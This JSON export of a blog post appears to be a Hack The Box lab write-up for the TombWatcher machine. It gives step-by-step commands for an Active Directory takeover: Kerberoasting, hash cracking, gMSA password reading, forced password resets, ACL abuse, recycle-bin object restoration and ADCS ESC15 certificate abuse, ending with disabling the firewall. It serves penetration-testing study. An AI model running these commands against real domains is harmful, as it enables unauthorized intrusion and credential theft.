{"id":304,"date":"2025-06-11T10:45:54","date_gmt":"2025-06-11T02:45:54","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=304"},"modified":"2026-01-29T16:18:33","modified_gmt":"2026-01-29T08:18:33","slug":"304","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/06\/11\/304\/","title":{"rendered":"HTB Machine TombWatcher Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address: <code>10.129.97.234<\/code> (not a fixed IP address)<\/strong><\/p>\n<p><strong>Provided credentials: <code>henry \/ H3nry_987TGV!<\/code><\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.97.234 (10.129.97.234) 56(84) bytes of data.\n64 bytes from 10.129.97.234: icmp_seq=1 ttl=127 time=385 ms\n64 bytes from 10.129.97.234: icmp_seq=2 ttl=127 time=288 ms\n64 bytes from 10.129.97.234: icmp_seq=3 ttl=127 time=332 ms\n64 bytes from 10.129.97.234: icmp_seq=4 ttl=127 time=290 ms\n\n--- 10.129.97.234 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3003ms\nrtt min\/avg\/max\/mdev = 288.118\/323.742\/384.674\/39.398 ms<\/code><\/pre>\n<p>Network connectivity between the attack machine and the target is normal.<\/p>\n<h2>Firewall Check<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Jun  9 13:27:19 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.97.234\nNmap scan report for 10.129.97.234\nHost is up (0.37s latency).\nAll 65535 scanned ports on 10.129.97.234 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Mon Jun  9 13:28:05 2025 -- 1 IP address (1 host up) scanned in 46.65 seconds<\/code><\/pre>\n<p>Every port comes back as open|filtered (no response), so the FIN scan gives no indication of the target's firewall state.<\/p>\n<h2>Network Port Scan<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Jun  9 13:30:15 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.97.234\nNmap scan report for 10.129.97.234\nHost is up (0.29s latency).\nNot shown: 65516 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n80\/tcp    open  http          Microsoft IIS httpd 10.0\n|_http-title: IIS Windows Server\n| http-methods: \n|_  Potentially risky methods: TRACE\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-09 09:31:13Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n|_ssl-date: 2025-06-09T09:32:55+00:00; +4h00m00s from scanner time.\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n|_ssl-date: 2025-06-09T09:32:54+00:00; +3h59m58s from scanner time.\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-09T09:32:55+00:00; +4h00m00s from scanner time.\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n3269\/tcp  open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-09T09:32:54+00:00; +3h59m58s from scanner time.\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49677\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49678\/tcp open  msrpc         Microsoft Windows RPC\n49679\/tcp open  msrpc         Microsoft Windows RPC\n49698\/tcp open  msrpc         Microsoft Windows RPC\n49705\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2019|10 (97%)\nOS CPE: cpe:\/o:microsoft:windows_server_2019 cpe:\/o:microsoft:windows_10\nAggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n|   date: 2025-06-09T09:32:16\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   281.62 ms 10.10.14.1\n2   282.92 ms 10.129.97.234\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Mon Jun  9 13:32:58 2025 -- 1 IP address (1 host up) scanned in 163.76 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Jun  9 13:34:01 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.97.234\nNmap scan report for 10.129.97.234\nHost is up (0.29s latency).\nNot shown: 65531 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Mon Jun  9 13:34:46 2025 -- 1 IP address (1 host up) scanned in 45.19 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> port detailed scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scans also show that the target runs <code>Windows Server 2019<\/code> and is a domain controller; the domain name is <code>tombwatcher.htb<\/code>, the hostname is <code>dc01<\/code>, and an <code>IIS 10.0<\/code> web service is deployed as well.<\/p>\n<hr \/>\n<h1>Service Enumeration<\/h1>\n<h2>DNS Service (Port 53)<\/h2>\n<p>First, use <code>dig<\/code> to query the basic records served by the target's <code>DNS<\/code> service:<\/p>\n<pre><code class=\"language-shell\">dig any tombwatcher.htb @dc01.tombwatcher.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749447717655-bdf5f8dd-87b5-4344-86f3-fbfb5edfeed5.png\" alt=\"\" \/><\/p>\n<p>Apart from the domain controller's hostname, no subdomains were found.<\/p>\n<h2>Kerberos Service (Port 88)<\/h2>\n<p>Using the provided credentials, brute-force the <code>RID<\/code>s of domain users with <code>impacket-lookupsid<\/code>:<\/p>\n<pre><code class=\"language-shell\">ntpdate -s dc01.tombwatcher.htb\nimpacket-lookupsid -domain-sids tombwatcher.htb\/henry:'H3nry_987TGV!'@dc01.tombwatcher.htb 40000<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749450552650-fa0fa0ea-8be5-490e-8870-139877268189.png\" alt=\"\" \/><\/p>\n<p><code>SID<\/code> enumeration reveals the following users, which are saved to <code>aduser.lst<\/code>:<\/p>\n<pre><code class=\"language-plain\">Administrator\nGuest\nkrbtgt\nDC01$\nHenry\nAlfred\nsam\njohn\nansible_dev<\/code><\/pre>\n<p>In addition, a <code>Kerberoasting<\/code> attack obtained the <code>TGS-REP<\/code> hash of the <code>ansible_dev<\/code> user, but it could not be cracked.<\/p>\n<h2>Web Application (Port 80)<\/h2>\n<p>Open the home page: <code>http:\/\/dc01.tombwatcher.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749454900535-09b7f728-4f4f-4689-a065-b998db44994a.png\" alt=\"\" \/><\/p>\n<p>It is the default <code>IIS<\/code> page; a directory scan turned up nothing of interest.<\/p>\n<h2>Enumerating Domain Relationships from Outside the Domain<\/h2>\n<p>Since the challenge already provides a set of credentials, we can use <code>bloodhound-python<\/code> directly to connect to <code>LDAP<\/code> and enumerate the relationships inside the domain:<\/p>\n<pre><code class=\"language-shell\">bloodhound-python -c All -d tombwatcher.htb -u Henry -p 'H3nry_987TGV!' -dc dc01.tombwatcher.htb -ns 10.129.97.234 --zip<\/code><\/pre>\n<p>Then upload the zipped data set to <code>BloodHound<\/code> and click <code>Analysis =&gt; Find Shortest Paths to Domain Admins<\/code> to list the shortest attack paths in the domain:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749460955135-cbb81c65-9931-4f3a-8783-bedf9826f173.png\" alt=\"\" \/><\/p>\n<p>From the attack path graph we can observe the following:<\/p>\n<ul>\n<li>The current user <code>Henry<\/code> has <code>WriteSPN<\/code> over the user <code>Alfred<\/code>;<\/li>\n<li><code>Alfred<\/code> has <code>AddSelf<\/code> over the group <code>Infrastructure<\/code>;<\/li>\n<li>The group <code>Infrastructure<\/code> has <code>ReadGMSAPassword<\/code> over the group managed service account <code>ansible_dev$<\/code>;<\/li>\n<li>The group managed service account has <code>ForceChangePassword<\/code> over the user <code>sam<\/code>;<\/li>\n<li><code>sam<\/code> has <code>WriteOwner<\/code> over the user <code>john<\/code>;<\/li>\n<li><code>john<\/code> can log in to the <code>WinRM<\/code> remote management service.<\/li>\n<\/ul>\n<p>From this information we can derive a single path through the domain:<\/p>\n<ol>\n<li>Starting as <code>Henry<\/code>, use <code>targetedKerberoast<\/code> to perform an <code>SPN<\/code> hijacking attack against <code>Alfred<\/code>, obtain the <code>TGS-REP<\/code> hash and attempt to crack it;<\/li>\n<li>If it cracks, add <code>Alfred<\/code> to the <code>Infrastructure<\/code> group, then abuse the dangerous right over the group managed service account to read its <code>GMSA<\/code> password;<\/li>\n<li>With control of the group managed service account, use <code>net<\/code> to change <code>sam<\/code>'s password remotely;<\/li>\n<li>With control of <code>sam<\/code>, use <code>WriteOwner<\/code> to change the owner of the <code>john<\/code> user object, grant <code>GenericAll<\/code>, change the password and log in via <code>WinRM<\/code>.<\/li>\n<\/ol>\n<hr \/>\n<h1>Penetration Testing<\/h1>\n<h2>Exploiting Dangerous Relationships in the Domain<\/h2>\n<p>During service enumeration we already determined the attack path with <code>BloodHound<\/code>; now we execute it.<\/p>\n<p>First download <code>targetedKerberoast<\/code>:<\/p>\n<pre><code class=\"language-shell\">git clone https:\/\/github.com\/ShutdownRepo\/targetedKerberoast.git<\/code><\/pre>\n<p>Once downloaded, run the following command to launch the <code>SPN<\/code> hijacking attack against <code>Alfred<\/code>:<\/p>\n<pre><code class=\"language-shell\">\/home\/megumin\/Documents\/Programs\/targetedKerberoast\/targetedKerberoast.py -v --dc-ip 10.129.97.234 -d tombwatcher.htb -u Henry -p 'H3nry_987TGV!'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749462453790-bb9a3bba-278b-4631-aa8f-2b56945d43c6.png\" alt=\"\" \/><\/p>\n<p><code>Alfred<\/code>'s <code>TGS-REP<\/code> hash obtained! Try cracking it with <code>hashcat<\/code> and the <code>rockyou.txt<\/code> wordlist:<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 13100 -a 0 Z:\\tombwatcher\\Alfred-user-tgsrep.txt .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749462529668-2c4faf5e-80c6-4de3-ac3a-da76df05c1ed.png\" alt=\"\" \/><\/p>\n<p>User credentials obtained:<\/p>\n<ul>\n<li>Domain: <code>tombwatcher.htb<\/code><\/li>\n<li>Username: <code>Alfred<\/code><\/li>\n<li>Password: <code>basketball<\/code><\/li>\n<\/ul>\n<p>With <code>Alfred<\/code> under control, use the <code>AddSelf<\/code> right over the group to add <code>Alfred<\/code> to the <code>Infrastructure<\/code> group:<\/p>\n<pre><code class=\"language-shell\">bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u Alfred -p \"basketball\" add groupMember Infrastructure Alfred<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749463478507-1c77073d-b56b-4fef-b7fd-83371035e39a.png\" alt=\"\" \/><\/p>\n<p>Success! Next, use the <code>Infrastructure<\/code> group's <code>ReadGMSAPassword<\/code> right to read the <code>NTLM<\/code> hash of the group managed service account <code>ansible_dev$<\/code>:<\/p>\n<pre><code class=\"language-shell\">netexec ldap dc01.tombwatcher.htb -u Alfred -p \"basketball\" --gmsa<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749463840164-577cb4fd-db1e-4e8c-ac67-61a1288edd08.png\" alt=\"\" \/><\/p>\n<p>Obtained the temporary <code>GMSA<\/code> account credentials:<\/p>\n<ul>\n<li>Domain: <code>tombwatcher.htb<\/code><\/li>\n<li>Username: <code>ansible_dev$<\/code><\/li>\n<li><code>NTLM<\/code> hash: <code>1c37d00093dc2a5f25176bf2d474afdc<\/code><\/li>\n<\/ul>\n<p>With control of the group managed service account, use its <code>ForceChangePassword<\/code> right over the <code>sam<\/code> user object to change <code>sam<\/code>'s password with <code>pth-net<\/code>:<\/p>\n<pre><code class=\"language-shell\">pth-net rpc password \"sam\" \"Asd310056\" -U tombwatcher.htb\/\"ansible_dev$\"%\"ffffffffffffffffffffffffffffffff\"%\"1c37d00093dc2a5f25176bf2d474afdc\" -S dc01.tombwatcher.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749464428510-14157a74-6963-4104-96eb-5dcdcbb9e178.png\" alt=\"\" \/><\/p>\n<p>Success!<\/p>\n<p>Next, use <code>sam<\/code>'s <code>WriteOwner<\/code> right over the <code>john<\/code> user object to set the object's owner to <code>sam<\/code>, grant <code>GenericAll<\/code>, and then force a change of <code>john<\/code>'s password:<\/p>\n<pre><code class=\"language-shell\">bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u sam -p \"Asd310056\" set owner john sam\nimpacket-dacledit -action \"write\" -rights \"FullControl\" -principal \"sam\" -target \"john\" tombwatcher.htb\/sam:\"Asd310056\"\nnet rpc password \"john\" \"Asd310056\" -U tombwatcher.htb\/sam%\"Asd310056\" -S dc01.tombwatcher.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749465558069-96113034-e4e8-422d-a5c9-edda98adb877.png\" alt=\"\" \/><\/p>\n<p><code>john<\/code>'s password changed successfully! Log in directly with <code>evil-winrm<\/code>:<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i dc01.tombwatcher.htb -u john -p \"Asd310056\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749465682517-adc39f03-0fb0-4e17-a21b-bdd8c121883b.png\" alt=\"\" \/><\/p>\n<p><strong>User-level access obtained!<\/strong><\/p>\n<hr \/>\n<h1>Privilege Escalation<\/h1>\n<h2>Domain Relationship Information Gathering<\/h2>\n<p>After logging in as <code>john<\/code>, go back to <code>BloodHound<\/code> and click <code>JOHN@TOMBWATCHER.HTB =&gt; First Degree Object Control<\/code> to view the objects it controls directly: the <code>john<\/code> user object has <code>GenericAll<\/code> over the organizational unit <code>ADCS<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749604490887-10b97802-7c69-4dde-96a5-b9a0c47115b8.png\" alt=\"\" \/><\/p>\n<p>However, inspecting the <code>ADCS<\/code> organizational unit shows that it contains no users at all.<\/p>\n<p>Looking again at the machine name <code>TombWatcher<\/code>: since <code>Tomb<\/code> means a <strong>grave<\/strong>, it suggests that the <code>ADCS<\/code> organizational unit once contained users that were later deleted by the administrator <code>john<\/code>, so <strong>we need to look in the Active Directory recycle bin for deleted objects<\/strong>.<\/p>\n<blockquote><p>The <code>Active Directory Recycle Bin<\/code> is a feature that can be enabled on <code>Windows Server 2012<\/code> and later. It gives <code>Active Directory<\/code> a recycle-bin mechanism: when a domain object is deleted, <code>Active Directory<\/code> strips the object's non-essential attributes and stores it in the <code>CN=Deleted Objects,DC=example,DC=com<\/code> container. How long a deleted object is retained is governed by the <code>msDS-deletedObjectLifetime<\/code> attribute, whose value in turn comes from the forest's <code>tombstoneLifetime<\/code> attribute, by default <code>180<\/code> days.<\/p><\/blockquote>\n<p>Try <code>Get-ADObject<\/code> with the <code>-IncludeDeletedObjects<\/code> parameter to list deleted domain objects:<\/p>\n<pre><code class=\"language-powershell\">Get-ADObject -Filter {Deleted -eq $true} -IncludeDeletedObjects<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749606302106-2d7162ec-0afe-482e-840d-3e380cac675e.png\" alt=\"\" \/><\/p>\n<p>The recycle bin contains three <code>cert_admin<\/code> objects. The plan is to restore each of the three deleted user objects into the <code>ADCS<\/code> organizational unit with <code>Restore-ADObject<\/code>, use the <code>GenericAll<\/code> right to take full control of the restored object, reset its password, and then look for certificate template misconfigurations with <code>certipy-ad<\/code>.<\/p>\n<p>Performing these steps on the last <code>cert_admin<\/code> object in the recycle bin revealed the vulnerability. First restore it and reset its password:<\/p>\n<pre><code class=\"language-powershell\">Restore-ADObject -Identity \"CN=cert_admin\\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb\" -TargetPath \"OU=ADCS,DC=TOMBWATCHER,DC=HTB\"\nnet user cert_admin \/active:yes \/domain\nnet user cert_admin Asd310056 \/domain<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749607389379-769c84ee-e3f1-4634-a386-0d1504719822.png\" alt=\"\" \/><\/p>\n<p>Then use <code>certipy-ad<\/code> to look for certificate template misconfigurations:<\/p>\n<pre><code class=\"language-shell\">certipy-ad find -dc-ip 10.129.240.166 -u cert_admin@tombwatcher.htb -p \"Asd310056\" -vulnerable -stdout<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749607643463-0ec64882-b8a9-4ea3-a2de-7343faca2f77.png\" alt=\"\" \/><\/p>\n<p>The <code>cert_admin<\/code> user is affected by the <code>ADCS ESC15<\/code> certificate template vulnerability!<\/p>\n<h2>ADCS ESC15 Exploitation<\/h2>\n<p>Before starting, review how <code>ADCS ESC15<\/code> is exploited: <a href=\"https:\/\/github.com\/ly4k\/Certipy\/wiki\/06-%E2%80%90-Privilege-Escalation#esc15-arbitrary-application-policy-injection-in-v1-templates-cve-2024-49019-ekuwu\" target=\"_blank\" rel=\"nofollow\">06 \u2010 Privilege Escalation \u00b7 ly4k\/Certipy Wiki<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749608105773-75fd122a-ce44-4d62-b071-64605da017f7.png\" alt=\"\" \/><\/p>\n<p>First, use <code>certipy-ad<\/code> to request a certificate for the user <code>cert_admin<\/code> via the <code>WebServer<\/code> template, injecting the <code>Certificate Request Agent<\/code> application policy into the certificate:<\/p>\n<pre><code class=\"language-shell\">certipy-ad req -u cert_admin -p \"Asd310056\" -dc-ip 10.129.11.4 -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template \"WebServer\" -application-policies \"Certificate Request Agent\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749608593403-0539b5d5-21fe-4658-8b75-0c20fde18dfc.png\" alt=\"\" \/><\/p>\n<p>Request successful! Next, use the <code>cert_admin<\/code> certificate carrying the Certificate Request Agent identity to request a certificate for the domain administrator from the certificate service:<\/p>\n<pre><code class=\"language-shell\">certipy-ad req -u cert_admin -p \"Asd310056\" -dc-ip 10.129.240.166 -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template \"User\" -pfx cert_admin.pfx -on-behalf-of \"TOMBWATCHER\\Administrator\"<\/code><\/pre>\n<p>With that certificate in hand, use the <code>auth<\/code> function of <code>certipy-ad<\/code> to perform an <code>UnPAC<\/code> request and obtain the domain administrator's <code>NTLM<\/code> hash:<\/p>\n<pre><code class=\"language-shell\">certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.240.166<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749608837625-3ec38a6e-d3f2-4f94-afed-dc564fc7847e.png\" alt=\"\" \/><\/p>\n<p>Domain administrator credentials obtained:<\/p>\n<ul>\n<li>Domain: <code>tombwatcher.htb<\/code><\/li>\n<li>Username: <code>Administrator<\/code><\/li>\n<li><code>NTLM<\/code> hash: <code>f61db423bebe3328d33af26741afe5fc<\/code><\/li>\n<\/ul>\n<p>Use <code>crackmapexec<\/code> to run commands directly: reset the password, disable the firewall and enable the Remote Desktop service:<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb dc01.tombwatcher.htb -d tombwatcher.htb -u \"Administrator\" -H \"f61db423bebe3328d33af26741afe5fc\" -x \"net user Administrator Asd310056 \/domain\"\ncrackmapexec smb dc01.tombwatcher.htb -d tombwatcher.htb -u \"Administrator\" -p \"Asd310056\" -x \"netsh advfirewall set allprofiles state off\"\ncrackmapexec smb dc01.tombwatcher.htb -d tombwatcher.htb -u \"Administrator\" -p \"Asd310056\" -x \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p>Finally, connect to the remote desktop with <code>xfreerdp<\/code>:<\/p>\n<pre><code class=\"language-shell\">xfreerdp \/v:dc01.tombwatcher.htb \/u:Administrator \/p:\"Asd310056\" \/size:1440x900<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749609170028-219f1c0d-8d6f-4669-b4e0-281a3ef19f68.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation successful!<\/strong><\/p>\n<hr \/>\n<h1>End of This Machine's Penetration Test<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.129.97.234 (not a fixed IP address) Provided credentials: henry \/ H3nry_987TGV! Information Gathering &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[18,13],"tags":[],"class_list":["post-304","post","type-post","status-publish","format-standard","hentry","category-htb_season_8","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=304"}],"version-history":[{"count":2,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/304\/revisions"}],"predecessor-version":[{"id":306,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/304\/revisions\/306"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=304"}],"wp:term"
:[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}